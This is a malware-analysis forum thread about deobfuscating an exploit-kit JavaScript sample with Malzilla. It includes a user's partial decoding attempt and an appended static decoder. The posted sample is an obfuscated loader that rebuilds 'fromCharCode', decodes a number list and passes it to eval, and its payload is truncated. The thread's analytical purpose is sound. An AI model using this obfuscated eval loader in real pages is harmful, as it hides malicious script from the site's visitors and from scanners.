
Deobfuscate exploit kits using Malzilla


shellc0de:
Another version:


--- Code: ---<html><body><script>
g='rom';
g=g+'C';
g=g+'harCod';
g=g+'e';
if(window["documen"+"t"])aa=([].unshift+"");
aa=aa.split('').pop();
a='94&105&93&111&103&95&104&110&40&113&108&99&110&95&34&33&54&93&95&104&110&95&108&56&54&98&43&56&74&102&95&91&109&95&26&113&91&99&110&26&106&91&97&95&26&99&109&26&102&105&91&94&99&104&97&40&40&40&54&41&98&43&56&54&41&93&95&104&110&95&108&56&54&98&108&56&33&35&53[....it goes on.....]'.split("&");
md='a';
v=aa;
if(!(("\n"!=v)&&(v!='}'))){w=String;e=window['eval'];}
c='';
i=0;
s=x=a;
while(i!=s['length']){
c=c+w['f'+g](parseInt(s[0+i]) + 7 - 1);
i++;
}
e(c);
</script></body></html>
--- End code ---

Also found a bug in Malzilla while messing with the script: http://i.imgur.com/8zbZs.png

NINJA EDIT: This is how far I got at deobfuscating, but I'm not familiar enough with JS:
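--- Code: ---//first I find and replace all "&" with ","
for(i=0;i<a.length;i++){ // "<" rather than "<=": a[a.length] is undefined and would print NaN
 a[i]=parseInt(a[i],10)+6; // parseInt so string entries are added, not concatenated; +6 matches the sample's "+ 7 - 1"
 document.write(a[i]);
 document.write(',');
}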

--- End code ---
Then I paste the output into the misc decoder and click decimal to ascii.

EDIT2: Hey I figured it out! I see someone else already did too: http://www.virustotal.com/file-scan/report.html?id=19321549c048af5767c3ff1cfcac22e746dfddf8e09300276475834d668e4938-1325719223
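
An added example, not part of the original posts: a static decoder for the "&"-separated encoding in the sample above, which recovers the text without ever calling `eval`. `SAMPLE` is the first 14 values visible in the post; the function names are assumptions, and `guessOffsets` goes beyond the fixed `+ 7 - 1` shift to cover variants that only change that constant.

```javascript
// Added example: static decoder for the "&"-separated decimal encoding.
// It never calls eval(); decoded text is only returned for inspection.

// First 14 values visible in the post's `a` string (the rest is elided there).
const SAMPLE = '94&105&93&111&103&95&104&110&40&113&108&99&110&95';

// Split on "&" and parse like the sample's parseInt(), so a token with
// trailing junk (e.g. a paste marker) keeps its leading digits; empty or
// non-numeric tokens are dropped.
function parseCodes(payload) {
  return payload.split('&')
    .map(t => parseInt(t, 10))
    .filter(n => !Number.isNaN(n));
}

// The sample computes fromCharCode(n + 7 - 1), i.e. a fixed offset of 6.
function decode(payload, offset = 6) {
  return parseCodes(payload).map(n => String.fromCharCode(n + offset)).join('');
}

function isPrintable(c) {
  return c === 9 || c === 10 || c === 13 || (c >= 32 && c <= 126);
}

// Generalization (assumption: variants change only the constant): try each
// offset, keep results that are fully printable and contain a script hint.
function guessOffsets(payload, hints = ['document', 'function', 'eval', 'var ']) {
  const codes = parseCodes(payload);
  const hits = [];
  for (let offset = -64; offset <= 64; offset++) {
    if (!codes.every(n => isPrintable(n + offset))) continue;
    const text = codes.map(n => String.fromCharCode(n + offset)).join('');
    if (hints.some(h => text.includes(h))) hits.push({ offset, text });
  }
  return hits;
}

console.log(decode(SAMPLE));
console.log(guessOffsets(SAMPLE).map(h => h.offset));
```

Run it under Node or any standalone JS engine; the output is plain text to read, so the decoded layer is never executed.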

MysteryFCM:
Yep, come across that myself a few times, spoke to Bobby about it, but can't remember what he said caused it.

You can find the source code for Malzilla here if you'd like to try and identify the cause yourself;

http://sourceforge.net/projects/malzilla/files/Malzilla%20Win32%20Source%20package/

Not seen Bobby around for over a year or so, so unsure if he's still working on it.
